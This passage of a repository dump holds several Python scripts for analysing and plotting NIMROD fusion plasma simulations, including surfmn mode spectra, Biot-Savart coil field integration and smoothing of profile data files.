read_new = True\n if read_pickle:\n pickle_list=glob.glob(\"pickle*\")\n pickle_list.sort(key=pickle_sort)\n if len(pickle_list)>0:\n read_new=False\n for iobj in pickle_list:\n with open(iobj,'rb') as file:\n step=surfmnstep.SurfmnStep(None, None, None, None, None)\n step.load(file)\n steplist.append(step)\n# steplist.append(pickle.load(open(iobj, \"rb\" )))\n if read_new==True:\n workdir=os.getcwd()\n listobjs = os.listdir(workdir)\n listobjs.sort()\n for iobj in listobjs:\n if os.path.isdir(iobj):\n thisdir=workdir+'/'+iobj\n surfmn_file, dump, step, time, nimrodin = find_files(thisdir)\n steplist.append(surfmnstep.SurfmnStep(surfmn_file, dump, step, time,nimrodin))\n if show_plot:\n time_hist(steplist)\n if pickle_data:\n for step in steplist:\n if step==None:\n continue\n if step.surfmn_data==False:\n step.read_surfmn()\n if step.profdata==False:\n try:\n os.mkdir('tempprofile')\n except:\n print(\"tempprofile directoy exists\")\n copy2(step.dumpfile,'./tempprofile')\n copy2(step.nimrodin,'./tempprofile')\n os.chdir('tempprofile')\n step.get_profiles()\n for iobj in os.listdir('.'):\n os.remove(iobj)\n os.chdir('../')\n os.rmdir('tempprofile')\n filename=\"pickle\"+str(step.step).zfill(5)\n with open(filename,'wb') as file:\n step.dump(file)\n# pickle.dump(step,open(filename,'wb'))\n\n# steplist[1].read_surfmn()\n# print(steplist[1].get_resonance(\"psi\",1,-2))\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Surfmn runner.')\n parser.add_argument('--plot', action='store_true',help='shows plots')\n parser.add_argument('--pickle', action='store_true',help='pickle data')\n parser.add_argument('--read', '-r', action='store_true',help='read pickled data')\n args = vars(parser.parse_args())\n surfmn_runner(show_plot=args['plot'],pickle_data=args['pickle'],read_pickle=args['read'])\n" }, { "alpha_fraction": 0.5755603909492493, "alphanum_fraction": 0.6167751550674438, "avg_line_length": 29.086956024169922, "blob_id": "a26d130506b14213837d5ba39faad3a391a59ad4", "content_id": "c3f71cc23ec0ca80874b1df80f2c43fb7f44af40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1383, "license_type": "no_license", "max_line_length": 58, "num_lines": 46, "path": "/biotSavart/integrateBS.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n# coil class\n# \n\n# the line integral uses a solution vector\n# of length 6\n# the first 3 index are the x,y,z locations at (l)\n# the next 3 indexs are the values of bx,by,bz\n\nimport sys\nimport numpy as np\nimport coilClass as cc\nfrom scipy.integrate import odeint\ndef dBFunc(solVec,l,dxyz,xyzp):\n# integrand of Biot Savart for a line segment\n k = 1.0e-7 #mu_0/4pi\n x,y,z,bx,by,bz = solVec\n dx,dy,dz=dxyz\n xp,yp,zp=xyzp\n xVec = np.asarray([xp-x,yp-y,zp-z]) \n xNorm =np.linalg.norm(xVec)\n dlVec =np.asarray([dx,dy,dz])\n dBvec = np.cross(dlVec,xVec) * k /(xNorm**3) \n dS = np.asarray([dx,dy,dz,dBvec[0],dBvec[1],dBvec[2]])\n return dS\n\ndef intCoil(thisCoil,xyzp):\n bxyzVec = np.zeros(3)\n sol0 = np.zeros(6)\n for ii in range(thisCoil.segments):\n dx = thisCoil.xyz[0,ii+1]-thisCoil.xyz[0,ii]\n dy = thisCoil.xyz[1,ii+1]-thisCoil.xyz[1,ii]\n dz = thisCoil.xyz[2,ii+1]-thisCoil.xyz[2,ii]\n dxyz=np.asarray([dx,dy,dz])\n sol0[0]=thisCoil.xyz[0,ii]\n sol0[1]=thisCoil.xyz[1,ii]\n sol0[2]=thisCoil.xyz[2,ii]\n sol0[3]=bxyzVec[0]\n sol0[4]=bxyzVec[1]\n sol0[5]=bxyzVec[2]\n sol=odeint(dBFunc,sol0,[0.0,1.0],args=(dxyz,xyzp))\n bxyzVec[0]=sol[1,3]\n bxyzVec[1]=sol[1,4]\n bxyzVec[2]=sol[1,5]\n bxyzVec=bxyzVec * thisCoil.current\n return bxyzVec" }, { "alpha_fraction": 0.5912618637084961, "alphanum_fraction": 0.621730387210846, "avg_line_length": 30.0625, "blob_id": "1d9e46ec9e8b807feae1380ff9aecd81a08059fe", "content_id": "9ae3601dc66da3ccc7a3cc37837ba330d0cd7e26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3479, "license_type": "no_license", "max_line_length": 101, "num_lines": 112, "path": "/diiidNim/pFileClean.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n''' This script is useful for cleaning up the pfile'''\n\n###################################\nimport os\nimport numpy as np\nfrom scipy.interpolate import splev,splrep\nimport matplotlib.pyplot as plt\nhomeDir = os.environ['HOME']\n\n\ndef readField(thisFile,npts):\n field = np.zeros([npts,3])\n for ii in range(npts):\n thisLine = thisFile.readline()\n thisWord = thisLine.split()\n for jj in range(3):\n field[ii,jj]=float(thisWord[jj])\n return field\n\ndef writeField(writeFile, field):\n for ii in range(field.shape[0]):\n thisline = writeFile.write('{:-f} {:-f} {:-f}\\n'.format(field[ii,0],field[ii,1],field[ii,2]))\n\nclass modField:\n field0 = 0.0\n dFeild0 = 0.0\n weldPsi = -1.0\n mode = 0\n quadA = 0.0\n quadB = 0.0\n quadC = 0.0\n name = \"\"\n def __init__ (self, name, field0, dField0, weldPsi, mode):\n self.name = name\n self.field0 = field0\n self.dField0 = dField0\n self.weldPsi = weldPsi\n self.mode = mode\n def quadFit(self,fWeld,dfWeld):\n ''' Assume that the function is quadratic near the axis'''\n self.quadC = self.field0\n if (self.mode==0): # fit derivative at 0\n self.quadB = self.dField0\n self.quadA = (fWeld-self.quadB * self.weldPsi - self.quadC)/(self.weldPsi**2)\n else: #fit derivative at xweld\n self.quadA = (dfWeld * self.weldPsi +self.quadC - fWeld)/self.weldPsi**2\n self.quadB = dfWeld - 2.0* self.quadA * self.weldPsi\n def quadEval(self, psi):\n return self.quadA * psi**2 + self.quadB * psi + self.quadC\n def smooth (self, field):\n ''' This function applies a bump function fit to smooth the field'''\n splineField = splrep(field[:,0],field[:,1],k=3)\n fieldAtWeld = splev(self.weldPsi,splineField)\n dFieldAtWeld = splev(self.weldPsi,splineField,der=1)\n self.quadFit(fieldAtWeld,dFieldAtWeld)\n tempField = np.zeros(field.shape)\n for ix, ipsi in enumerate(field[:,0]):\n tempField[ix,0] = ipsi\n if (ipsi < self.weldPsi):\n tempField[ix,1] = self.quadEval(ipsi)\n else:\n tempField[ix,1] = field[ix,1]\n\n newSplineField = splrep(tempField[:,0],tempField[:,1],k=3)\n for ix, ipsi in enumerate(tempField[:,0]):\n tempField[ix,2]= splev(ipsi,newSplineField,der=1)\n# plot fields\n x2 = np.linspace(0, 1, 200)\n y2 = splev(x2, splineField)\n y3 = splev(x2, newSplineField)\n plt.plot(x2, y2, x2, y3)\n plt.show()\n \n return tempField\n\n\nfilePath = homeDir + \"/SCRATCH/174446_debug2/eq1/\"\npFileName = \"p174446.3390.0_new_rot_fits\"\npFileWrite = pFileName + \".smooth\"\n\n\n# Set up field \nomgeb = modField(\"omgeb(kRad/s)\",21.6,0.0,0.1,1)\nkpol = modField(\"kpol(km/s/T)\",-7.5,0.0,0.1,1)\n\nfixList = [omgeb,kpol]\n\nprint(filePath + pFileName)\nthisFile = open(filePath+pFileName,\"r\")\nwriteFile = open(filePath+pFileWrite, \"w\")\n\nprint (\"Reading file \" + filePath+pFileName )\nwhile True:\n thisLine = thisFile.readline()\n if len(thisLine)==1:\n break\n thisWord = thisLine.split()\n if len(thisWord)>4: break\n writeFile.write(thisLine)\n print (\"Reading Field \" + thisWord[2])\n thisField = readField(thisFile,int(thisWord[0]))\n for iFix in fixList:\n if iFix.name == thisWord[2]:\n print(iFix.name)\n thisField=iFix.smooth(thisField)\n print (\"Writing Field \" + thisWord[2])\n writeField(writeFile,thisField)\n\n\nthisFile.close()\nwriteFile.close()\n" }, { "alpha_fraction": 0.6475300192832947, "alphanum_fraction": 0.6702269911766052, "avg_line_length": 25.75, "blob_id": "da6947e34cfa1079a4d74461532f0957a1dbdd30", "content_id": "cfff5910703ba478ba2d53bbd1c6f95004ef83bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1498, "license_type": "no_license", "max_line_length": 80, "num_lines": 56, "path": "/surfmn/surfmn_analysis.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#\n#\n# Do neat stuff\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport h5py\nimport scipy.interpolate as interp\nimport surfmnstep \nimport matplotlib.colors as mcolors\n\ndef get_m_index(m, m_max):\n return m+m_max\n\ndef surfmn_plot(mr,fmn,ffac,levels,vmax,m_range,q,title,cbar_ticks,reset=False):\n if reset:\n levels=301\n vmax=np.amax(fmn)*ffac\n levels=np.linspace(0,vmax,301)\n cbar_ticks = np.linspace(0,vmax,11)\n\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n plt.set_cmap('nipy_spectral')\n conf=plt.contourf(mr[0,:,:],mr[1,:,:],fmn*ffac,levels=levels,vmax=vmax)\n plt.plot(m_range,q,c='w')\n plt.title(title,fontsize=16)\n plt.ylabel(r'<r>',fontsize=16)\n plt.xlabel('m',fontsize=16)\n cbar=fig.colorbar(conf,ticks=cbar_ticks)\n plt.show()\n\ndef radial_plot(mr,fmn,ffac,mlist,m_max,qlist,qlabel,title,ylabel):\n colorlist = list(mcolors.TABLEAU_COLORS)\n fig = plt.figure(figsize=(6,5))\n ax= fig.add_subplot(111)\n for im,this_m in enumerate(mlist):\n this_i = get_m_index(this_m,m_max)\n plt_lbl = \"m = \" + str(this_m)\n tc=colorlist[im]\n ax.plot(mr[1,:,1],fmn[:,this_i]*ffac, color=tc, label=plt_lbl)\n for iq,this_q in enumerate(qlist):\n this_rho = psi_of_q(this_q) \n this_lbl = qlabel[iq]\n tc=colorlist[iq]\n ax.axvline(this_rho,ls=':',color=tc, label=this_lbl)\n\n ax.axhline(0,ls='-',c='k')\n ax.legend(loc=0)\n plt.title(title)\n plt.xlabel(r'<r>')\n plt.ylabel(ylabel)\n plt.tight_layout()\n plt.show()\n" }, { "alpha_fraction": 0.5573705434799194, "alphanum_fraction": 0.6571713089942932, "avg_line_length": 30.381250381469727, "blob_id": "44b104ee7287065958dc8ad3ffa58782b135853e", "content_id": "b4c75bf8fc4cbc00804fc088f154602a256174ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5020, "license_type": "no_license", "max_line_length": 99, "num_lines": 160, "path": "/plotingScripts/surfmnPlts.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport h5py\nimport scipy.interpolate as interp\n\n\ndef get_m_index(m, m_max):\n return m+m_max\n\nplot_type = \"nonlinear2\"\n\n#vacuum,linear, nonlinear\n\n\nrun_dir = \"19092601_l5\"\n#run_dir = \"1908163\"\ndump_num = \"40000\"\nhomeDir = os.environ['HOME']\nscratchDir = homeDir + '/SCRATCH'\nfileName = scratchDir+'/174446_novac_fl/eq26/1908013/08000/surfmn.08000.h5'\nfileName = scratchDir+'/174446_novac_debug/vac_eq28_rmp/surfmn.00100.h5'\nfileName = \"/home/research/ehowell/SCRATCH/174446_novac_new_eq/surfmn_optimize/vac/surfmn.00100.h5\"\nfileName = \"/home/research/ehowell/SCRATCH/174446_novac_new_eq/surfmn_optimize/vac/surfmn.00100.h5\"\nfileName = scratchDir+'/174446_novac_fl/eq26/'+run_dir+'/'+ dump_num +'/surfmn.'+ dump_num + '.h5'\n\n#run_dir = \"case_15_vac\"\n#dump_num = \"00100\"\n#fileName = scratchDir+'/174446_novac_new_eq/surfmn_scan/'+run_dir+'/surfmn.'+ dump_num + '.h5'\n\n#fileName = scratchDir+'/166439/03300_vac_eq/complexconj_rmp_vac5_fpsep2/surfmn.00005.h5'\n#fileName = scratchDir+'/166439/03300_vac_eq/complexconj_rmp_vac5_fpsep2/surfmn.00005_rr.h5'\n#fileName = scratchDir+'/166439//03300_vac_eq/complexconj_rmp_vac/surfmn.00005.h5'\n\nif (plot_type==\"vacuum\"):\n fileName = scratchDir + \"/166439/03300_2_equilbria/19091201_vac_lphi5_fp/surfmn.00100.h5\"\n n1_title = r' Vacuum n=1 $|B_\\psi|$ [A.U.]'\n n3_title = r' Vacuum n=3 $|B_\\psi|$ [A.U.]'\nelif (plot_type==\"linear\"):\n fileName = scratchDir + \"/166439/03300_2_fl/19091702/lphi5_rmp_cfl_b/200000/surfmn.200000.h5\"\n n1_title = r' Linear n=1 $|B_\\psi|$ [A.U.]'\n n3_title = r' Linear n=3 $|B_\\psi|$ [A.U.]'\nelif (plot_type==\"nonlinear\"):\n fileName = scratchDir + \"/166439/03300_2_fl//19091702/lphi5_nolinear_fresh/22000/surfmn.22000.h5\"\n n1_title = r' Nonlinear n=1 $|B_\\psi|$ [A.U.]'\n n3_title = r' Nonlinear n=3 $|B_\\psi|$ [A.U.]'\nelif (plot_type==\"nonlinear2\"):\n fileName = scratchDir + \"/166439/03300_2_fl//19091702/lphi5_nolinear_fresh/10000/surfmn.10000.h5\"\n n1_title = r' Nonlinear n=1 $|B_\\psi|$ [A.U.]'\n n3_title = r' Nonlinear n=3 $|B_\\psi|$ [A.U.]'\n\n#n1_scale\nplt.ylabel(r'$|B_\\psi|$ [A.U.]')\nsfac=1e4\nvmax_n1 = 4.0\nvmax_n3 = 4.0\nlevel1=np.linspace(0,vmax_n1,301)\nlevel3=np.linspace(0,vmax_n3,301)\n\nn1_cbar_ticks = np.linspace(0,vmax_n1,11)\nn3_cbar_ticks = np.linspace(0,vmax_n3,11)\nprint (n1_cbar_ticks)\n\nm_plot_list = [-6,-5,-4,-3,-2,-1, 0]\nq1_plot_list = [-2,-3,-4]\nq3_plot_list = [-1.67,-2.00,-2.33]\n\nprofNames = ['Vprime','q']\nwith h5py.File(fileName,'r') as fc:\n# for aname, avalue in fc.attrs.items():\n# print(aname,avalue)\n mrGrid = fc['surfmnGrid'][:]\n bmn = fc['Bmn001'][:]\n bmn3 = fc['Bmn003'][:]\n rho = fc['rho'][:]\n profs = fc['prof'][:]\n# print(fc.keys())\n \npsi_of_q = interp.interp1d(profs[1,:],rho)\nm1_range = np.linspace(-1.043,-5.9)\nq_of_m1 = psi_of_q(m1_range)\nm3_range = np.linspace(-3.129,-15)\nq_of_m3 = psi_of_q(m3_range/3.00)\n\nm_max = int((bmn.shape[1]-1)/2)\n#print(m_max)\n\n#print(mrGrid.shape[2])\n#print(bmn.shape)\nfig = plt.figure()\nax=fig.add_subplot(111)\nplt.set_cmap('nipy_spectral')\nconf=plt.contourf(mrGrid[0,:,:],mrGrid[1,:,:],bmn*sfac,levels=level1,vmax=vmax_n1)\nplt.plot(m1_range,q_of_m1,c='w')\nplt.title(n1_title,fontsize=16)\nplt.ylabel(r'<r>',fontsize=16)\nplt.xlabel('m',fontsize=16)\ncbar=fig.colorbar(conf,ticks=n1_cbar_ticks)\nplt.show()\n#plt.colorbar(ticks=n1_cbar_ticks)\n\nfig = plt.figure()\nax=fig.add_subplot(111)\nplt.set_cmap('nipy_spectral')\nconf=plt.contourf(mrGrid[0,:,:],mrGrid[1,:,:],bmn3*sfac,levels=level3,vmax=vmax_n3)\nplt.plot(m3_range,q_of_m3,c='w')\nplt.title(n3_title,fontsize=16)\nplt.ylabel(r'<r>',fontsize=16)\nplt.xlabel('m',fontsize=16)\ncbar=fig.colorbar(conf,ticks=n3_cbar_ticks)\nplt.show()\n\nfig = plt.figure(figsize=(6,6))\nax= fig.add_subplot(111)\nfor this_m in m_plot_list:\n this_i = get_m_index(this_m,m_max)\n plt_lbl = \"m = \" + str(this_m)\n ax.plot(mrGrid[1,:,1],bmn[:,this_i], label=plt_lbl)\nfor this_q in q1_plot_list:\n this_rho = psi_of_q(this_q) \n this_lbl = \"q = \" + str(this_q)\n ax.axvline(this_rho,ls=':', label=this_lbl)\n\n#ax.axvline(0.607025,ls=':',c='b', label=\"q=2\")\n#ax.axvline(0.75138,ls=':',c='g', label=\"q=3\")\n#ax.axvline(0.849892,ls=':',c='c', label=\"q=4\")\n\nax.axhline(0,ls='-',c='k')\nax.legend(loc=0)\nplt.title(r'Vacuum n=1 response')\nplt.xlabel(r'<r>')\nplt.ylabel(r'$|B_\\psi|$ [A.U.]')\nplt.tight_layout()\nplt.show()\n\n\nfig = plt.figure(figsize=(6,6))\nax= fig.add_subplot(111)\nfor this_m in m_plot_list:\n this_i = get_m_index(this_m,m_max)\n plt_lbl = \"m = \" + str(this_m)\n ax.plot(mrGrid[1,:,1],bmn3[:,this_i], label=plt_lbl)\nfor this_q in q3_plot_list:\n this_rho = psi_of_q(this_q) \n this_lbl = \"q = \" + str(this_q)\n ax.axvline(this_rho,ls=':', label=this_lbl)\n\n#ax.axvline(0.607025,ls=':',c='b', label=\"q=2\")\n#ax.axvline(0.75138,ls=':',c='g', label=\"q=3\")\n#ax.axvline(0.849892,ls=':',c='c', label=\"q=4\")\n\nax.axhline(0,ls='-',c='k')\nax.legend(loc=0)\nplt.title(r'Vacuum n=3 response')\nplt.xlabel(r'<r>')\nplt.ylabel(r'$|B_\\psi|$ [A.U.]')\nplt.tight_layout()\nplt.show()" }, { "alpha_fraction": 0.5741095542907715, "alphanum_fraction": 0.6316864490509033, "avg_line_length": 33.205238342285156, "blob_id": "af48dcc3b9343933f9b48749cb7b983fe0b72ecd", "content_id": "98e9674bd9ccb766b7e5639e2f109663d4fc45d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7833, "license_type": "no_license", "max_line_length": 117, "num_lines": 229, "path": "/surfmnNim/surfmnPlot.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport numpy as np\nfrom matplotlib import ticker\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom surfmn import files,rho1,bnm,irho12,irho13,irho14,irho15,irho16,rho,fgfile,irho2,irho3,irho4,q1,irho110,m,mrange\n\nbnmflip=bnm[:,::-1]\n\nplotsurf=1\nplotsurf2wall=0\nplotmag=1\nplotmag2wall=0\nbylim=9e-4\n\nsavepath = \"/home/research/ehowell/SCRATCH/166439/03300_q104_flowtesting/n1_run1/orginal_exb/300000/\"\n\nbasename=\"vac1\"\nnfour=1\n\n\nxyfile=0\n\nxyfilestr=files[xyfile][8:10]\n\n\n\nvacn2=bnmflip[0,8,irho2]\nvacn3=bnmflip[0,7,irho3]\nvacn4=bnmflip[0,6,irho4]\n\nvacn12=bnmflip[0,8,irho12]\nvacn13=bnmflip[0,7,irho13]\nvacn14=bnmflip[0,6,irho14]\nvacn15=bnmflip[0,5,irho15]\nvacn16=bnmflip[0,4,irho16]\n\n#plotting routines\n\nclines=301 #levels of filled contours\nibmax=len(rho[fgfile])+1\n\nif plotmag2wall==1:\n\n fig,ax=plt.subplots(figsize=(6,6))\n ax.plot(rho1,bnmflip[xyfile,mrange+1].real,color='m',label='m=-1',lw=3)\n ax.plot(rho1,bnmflip[xyfile,mrange+2].real,color='r',label='m=-2',lw=3)\n ax.plot(rho1,bnmflip[xyfile,mrange+3].real,color='b',label='m=-3',lw=3)\n ax.plot(rho1,bnmflip[xyfile,mrange+4].real,color='g',label='m=-4',lw=3)\n ax.plot(rho1,bnmflip[xyfile,mrange+5].real,color='y',label='m=-5',lw=3)\n ax.plot(rho1,bnmflip[xyfile,mrange+6].real,color='lime',label='m=-6',lw=3)\n ax.axvline(x=rho1[irho12],lw=3,ls='dotted',c='r',label=r'$q=-2$')\n ax.axvline(x=rho1[irho13],lw=3,ls='dotted',c='b',label=r'$q=-3$')\n ax.axvline(x=rho1[irho14],lw=3,ls='dotted',c='g',label=r'$q=-4$')\n ax.axvline(x=rho1[irho15],lw=3,ls='dotted',c='y',label=r'$q=-5$')\n ax.axvline(x=rho1[irho16],lw=3,ls='dotted',c='lime',label=r'$q=-5$')\n\n ax.plot(rho1[irho12],vacn12,marker=7,color='r',markersize=16) \n ax.plot(rho1[irho13],vacn13,marker=7,color='b',markersize=16) \n ax.plot(rho1[irho14],vacn14,marker=7,color='g',markersize=16) \n ax.plot(rho1[irho15],vacn15,marker=7,color='y',markersize=16) \n ax.plot(rho1[irho16],vacn16,marker=7,color='lime',markersize=16)\n \n ax.legend(loc=1,ncol=2,fontsize=14)\n \n ax.yaxis.major.formatter._useMathText = True\n ax.ticklabel_format(axis='y', style='sci', scilimits=(-2,-2))\n ax.yaxis.offsetText.set_fontsize(20)\n ax.locator_params(axis='x',nbins=5)\n\n# ax.set_xlim([.1,1]) \n\n# ax.set_ylim([0,4e-3]) \n \n plt.setp(ax.get_xticklabels(), fontsize=22)\n plt.setp(ax.get_yticklabels(), fontsize=22)\n \n ax.set_xlabel(r'$<r>_N}$',fontsize=24)\n ax.set_ylabel(r'$B_{r(m,n)}\\,{\\rm (T)}$',fontsize=24)\n \n plt.savefig('Bm2wall'+xyfilestr+'.png',bbox_inches='tight')\n\n\nif plotmag==1:\n\n fig,ax=plt.subplots(figsize=(6,6))\n ax.plot(rho[fgfile],bnmflip[xyfile,mrange+1,1:ibmax].real,color='m',label='m=-1',lw=3)\n ax.plot(rho[fgfile],bnmflip[xyfile,mrange+2,1:ibmax].real,color='r',label='m=-2',lw=3)\n ax.plot(rho[fgfile],bnmflip[xyfile,mrange+3,1:ibmax].real,color='b',label='m=-3',lw=3)\n# ax.plot(rho[fgfile],bnmflip[xyfile,mrange+4,1:ibmax].real,color='g',label='m=-4',lw=3)\n ax.axvline(x=rho[fgfile][irho2],lw=3,ls='dotted',c='r',label=r'$q=2$')\n ax.axvline(x=rho[fgfile][irho3],lw=3,ls='dotted',c='b',label=r'$q=3$')\n # ax.axvline(x=rho[fgfile][irho4],lw=3,ls='dotted',c='g',label=r'$q=4$')\n\n# ax.plot(rho[fgfile][irho2],vacn2,marker=7,color='r',markersize=16) \n# ax.plot(rho[fgfile][irho3],vacn3,marker=7,color='b',markersize=16) \n# ax.plot(rho[fgfile][irho4],vacn4,marker=7,color='g',markersize=16) \n \n ax.legend(loc=2,ncol=2,fontsize=14)\n \n ax.yaxis.major.formatter._useMathText = True\n ax.ticklabel_format(axis='y', style='sci', scilimits=(-2,-2))\n ax.yaxis.offsetText.set_fontsize(20)\n ax.locator_params(axis='x',nbins=5)\n\n# ax.set_xlim([.1,1]) \n\n ax.set_ylim([0,bylim]) \n \n plt.setp(ax.get_xticklabels(), fontsize=22)\n plt.setp(ax.get_yticklabels(), fontsize=22)\n \n ax.set_xlabel(r'$\\rho_N$',fontsize=24)\n ax.set_ylabel(r'$B_{r(m,n)}\\,{\\rm (T)}$',fontsize=24)\n \n# plt.savefig('Bm'+xyfilestr+'.png',bbox_inches='tight')\n \n plt.savefig(savepath + basename + \"Bm.png\",bbox_inches='tight')\nif plotsurf2wall==1:\n bmmax=np.amax(bnmflip[xyfile,:,1:])\n bmmin=0\n\n# bmmax=np.amax(bm2) \n# bmmin=np.amin(bm2) \n \n# if abs(bmmax)>abs(bmmin):\n# bmmin=-bmmax\n# else:\n# bmmax=-bmmin\n \n# bmmax=0.002792068 \n \n nlev=100\n levels=np.arange(bmmin,bmmax,(bmmax-bmmin)/nlev)\n \n fig,ax=plt.subplots(figsize=(10,6))\n \n CS = ax.contourf(m,rho1[1:],np.rot90(bnmflip[xyfile,:,1:],k=-1),levels,cmap=cm.nipy_spectral,levels=100)\n# CS = ax.contourf(m,rho[fgfile],bm2,levels,cmap=cm.seismic)\n \n plt.setp(ax.get_xticklabels(), fontsize=22)\n plt.setp(ax.get_yticklabels(), fontsize=22)\n \n cbar=fig.colorbar(CS)\n tick_locator = ticker.MaxNLocator(nbins=5)\n cbar.locator = tick_locator\n cbar.ax.tick_params(labelsize=22)\n cbar.ax.yaxis.set_offset_position('left')\n cbar.ax.yaxis.offsetText.set_fontsize(20)\n cbar.formatter.set_powerlimits((0,0))\n cbar.update_ticks()\n cbar.set_label(r'$B_{r(m,n)}\\,{\\rm (T)}$',fontsize=24)\n ax.locator_params(axis='y',nbins=5)\n \n ax.plot(q1[1:irho110],rho1[1:irho110],c='white',lw=5,ls='dashed',label=r'$m=qn$')\n \n ax.axhline(y=rho1[irho12],lw=3,ls='dotted',c='r',label=r'$q=-2$')\n ax.axhline(y=rho1[irho13],lw=3,ls='dotted',c='b',label=r'$q=-3$')\n# ax.axhline(y=rho1[irho14],lw=3,ls='dotted',c='g',label=r'$q=-4$')\n# ax.axhline(y=rho1[irho15],lw=3,ls='dotted',c='y',label=r'$q=-5$')\n# ax.axhline(y=rho1[irho16],lw=3,ls='dotted',c='lime',label=r'$q=-6$')\n \n ax.legend(loc=4,fontsize=18,framealpha=.75)\n \n ax.set_ylabel(r'$<r>_N$',fontsize=24)\n ax.set_xlabel(r'$m$',fontsize=24)\n ax.set_xlim([-mrange,mrange])\n \n ax.set_ylim([.1,1.45]) \n \n #plt.savefig('surfmn_comp_15000.png',bbox_inches='tight')\n plt.savefig('surfmn2wall'+xyfilestr+'.png',bbox_inches='tight')\n\nif plotsurf==1:\n bmmax=np.amax(bnmflip[xyfile,:,1:])\n bmmax=bylim\n bmmin=0\n\n# bmmax=np.amax(bm2) \n# bmmin=np.amin(bm2) \n \n# if abs(bmmax)>abs(bmmin):\n# bmmin=-bmmax\n# else:\n# bmmax=-bmmin\n \n# bmmax=0.00278744622 \n \n nlev=100\n levels=np.arange(bmmin,bmmax,(bmmax-bmmin)/nlev)\n \n fig,ax=plt.subplots(figsize=(10,6))\n \n CS = ax.contourf(m,rho[fgfile],np.rot90(bnmflip[xyfile,:,1:ibmax],k=-1),levels,cmap=cm.nipy_spectral)\n# CS = ax.contourf(m,rho[fgfile],bm2,levels,cmap=cm.seismic)\n \n plt.setp(ax.get_xticklabels(), fontsize=22)\n plt.setp(ax.get_yticklabels(), fontsize=22)\n \n cbar=fig.colorbar(CS)\n tick_locator = ticker.MaxNLocator(nbins=5)\n cbar.locator = tick_locator\n cbar.ax.tick_params(labelsize=22)\n cbar.ax.yaxis.set_offset_position('left')\n cbar.ax.yaxis.offsetText.set_fontsize(20)\n cbar.formatter.set_powerlimits((0,0))\n cbar.update_ticks()\n cbar.set_label(r'$B_{r(m,n)}\\,{\\rm (T)}$',fontsize=24)\n ax.locator_params(axis='y',nbins=5)\n \n ax.plot(nfour*q1[:rho[fgfile].size],rho[fgfile],c='white',lw=5,ls='dashed',label=r'$m=qn$')\n \n ax.axhline(y=rho[fgfile][irho2],lw=3,ls='dotted',c='r',label=r'$q=-2$')\n ax.axhline(y=rho[fgfile][irho3],lw=3,ls='dotted',c='b',label=r'$q=-3$')\n #ax.axhline(y=rho[fgfile][irho4],lw=3,ls='dotted',c='g',label=r'$q=-4$')\n \n ax.legend(loc=4,fontsize=18,framealpha=.75)\n \n ax.set_ylabel(r'$\\rho_N$',fontsize=24)\n ax.set_xlabel(r'$m$',fontsize=24)\n ax.set_xlim([-mrange,mrange])\n ax.set_ylim([.1,.99]) \n \n #plt.savefig('surfmn_comp_15000.png',bbox_inches='tight')\n #plt.savefig('surfmn'+xyfilestr+'.png',bbox_inches='tight')\n plt.savefig(savepath + basename + \"surfmn.png\",bbox_inches='tight')\n\nplt.show()\n" }, { "alpha_fraction": 0.5662786364555359, "alphanum_fraction": 0.6064589023590088, "avg_line_length": 32.929935455322266, "blob_id": "da460cdb76b6dd9f39dcea74c29270166533000a", "content_id": "b8e94965a9f58e1e54b6f60a4bf558e57c8afab0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5326, "license_type": "no_license", "max_line_length": 97, "num_lines": 157, "path": "/biotSavart/biotSavartFunction.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#\n# Input files:\n# Ouput file:\n\n\nimport os\nimport numpy as np\nimport sys\nimport coilClass as cc\nimport integrateBS as bs\nimport h5py\nfrom scipy.interpolate import interp1d\nimport scipy.optimize as opt\n\nclass coil_opt:\n rmag_axis=1.7682\n zmag_axis=0.0\n coil_r = 0.6\n distance_coil = 1.2\n delta_theta=0.20\n delta_tilt=.15\n coil_theta = [0, delta_theta, .5, 1-delta_theta]\n coil_tilt = [0.25, .5+delta_tilt, .75, 1-delta_tilt]\n phiPlanes = 4 \n segmentsPerCoil = 50\n baseCurrent = 1.0\n nPert = 1\n npCoil = len(coil_theta)\n nodeXYZ = np.zeros(0)\n coilBRZPhi = np.zeros(0)\n coilList = []\n filePath = \"\"\n baseFileName = \"brmpn\"\n fileExt = \".dat\"\n\n def __init__(self,filePath):\n self.filePath =filePath\n rzfile = filePath + 'nimrod_bdry_rz.txt'\n########### begin code #########\n nodeRZ = np.loadtxt(rzfile,comments='%',delimiter=',', skiprows=1)\n self.nodeXYZ = np.zeros([3,nodeRZ.shape[0],self.phiPlanes])\n self.coilBRZPhi = np.zeros([3,nodeRZ.shape[0],self.phiPlanes,self.npCoil])\n for iPhi in range(self.phiPlanes):\n sinPhi = np.sin(iPhi*2.0*np.pi/self.phiPlanes)\n cosPhi = np.cos(iPhi*2.0*np.pi/self.phiPlanes)\n self.nodeXYZ[0,:,iPhi]=nodeRZ[:,0]*cosPhi\n self.nodeXYZ[1,:,iPhi]=nodeRZ[:,0]*sinPhi\n self.nodeXYZ[2,:,iPhi]=nodeRZ[:,1]\n\n for ipcoil in range(self.npCoil):\n self.coilList.append([])\n\n #convert node locations to xyz coordinates at multiple phi planes\n\n for ii in range(6):\n phi = np.pi * ii/3.0\n thisCurrent = self.baseCurrent * 